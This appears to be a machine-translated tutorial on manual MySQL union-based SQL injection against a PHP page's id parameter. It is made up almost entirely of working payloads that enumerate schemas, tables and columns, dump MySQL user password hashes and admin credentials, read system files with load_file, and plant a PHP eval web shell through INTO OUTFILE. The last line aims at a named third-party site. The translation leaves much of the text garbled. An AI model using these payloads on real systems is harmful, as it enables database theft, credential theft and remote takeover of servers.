Demo of manual advanced mysql injection instance

In order to facilitate the handwriting of An SQL. php injection point. If the classic id is not filtered, the SQL statement is inserted into the parameter for injection. You can import the database file test. SQL.

Injection Using the Information_schema system library and using the group_concat () function, group_concat () is powerful and can bypass limit restrictions.

Http://www.bkjia.com/ SQL .php? Id = 1 union select 0, 0, 0

The field is 3.

Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select count (*), 1, 1 from mysql. user

Count the number of users in the database

Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, 2, group_concat (schema_name) from information_schema.schemata

During the test, only root or global permissions can be used to expose all common database users.
In this way, all the database names of the mysql server are displayed.

Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, 2, group_concat (table_name) from information_schema.tables where table_schema = 0x74657374

This will display all the tables in the test database. 0x74657374 indicates the hex Value of test.

Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, 2, group_concat (column_name) from information_schema.columns where table_name = 0x61646D696E

In this way, all the field names in the admin table are displayed.

The injection method is flexible. It broke the limit.
Let's see the injection Statement of pangolin.

Only root or global permissions are allowed for the following operations:

Select user from mysql. user

Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select concat (char (94), char (94), char (94), user, char (94), char (94 ), char (94), 1, 1 from (select * from mysql. user order by user limit 6, 1) t order by user desc) t limit 1 -- view the users in the database

Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select concat (char (94), char (94), char (94), password, char (94), char (94 ), char (94), 1, 1 from (select * from mysql. user order by user limit 6, 1) t order by user desc) t limit 1 -- view the password of the corresponding user

By constantly modifying limit 2, 1 to view all

Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select concat (char (94), char (94), char (94), password, char (94), char (94 ), char (94), 1, 1 from (select * from mysql. user order by user limit 2, 1) t order by user desc) t limit 1 --

Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, username, password from admin limit 0, 10
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, username, password from admin limit 1,10
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, username, password from admin limit 2, 10

Retrieve records by using limit

You can also use the group_concat () function to display it at a time.

Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, group_concat (username), group_concat (password) from admin

Note that the Application Path of into outfile is c:/2ww. php.

Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select concat (char (60), char (63), char (112), char (104), char (112 ), char (32), char (101), char (118), char (97), char (108), char (40), char (36), char (95 ), char (80), char (79), char (83), char (84), char (91), char (99), char (109), char (100 ), char (93), char (41), char (63), char (62), 1,1 into outfile c:/cm14dd. php

<? Php eval ($ _ POST [cmd])?> Asc code

Char (60), char (63), char (112), char (104), char (112), char (32), char (101), char (118 ), char (97), char (108), char (40), char (36), char (95), char (80), char (79), char (83 ), char (84), char (91), char (99), char (109), char (100), char (93), char (41), char (63 ), char (62)

Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, <? Php eval ($ _ POST [cmd])?>, 3 into outfile c:/tt33.txt

Load_file Application

Http://www.bkjia.com// SQL .php? Id = 1 and 1 = 2 union select concat (char (94), char (94), char (94), load_file (0x633a5c626f6f742e696e69), char (94 ), char (94), char (94), 1, 1 --

0x633a5c626f6f742e696e69 is the hex Encoding of c: oot. ini.
Http://www.bkjia.com/ SQL .php? Id = 1 and 1 = 2 union select 1, 2, load_file (c:/boot. ini)

Http://www.nowpc.net/concrete.php? Id = 5% 20and % 201 = 2% 20 union % 20 select % ,,2, 3, 4, group_concat (schema_name) % 20 from % 20information_schema.schemata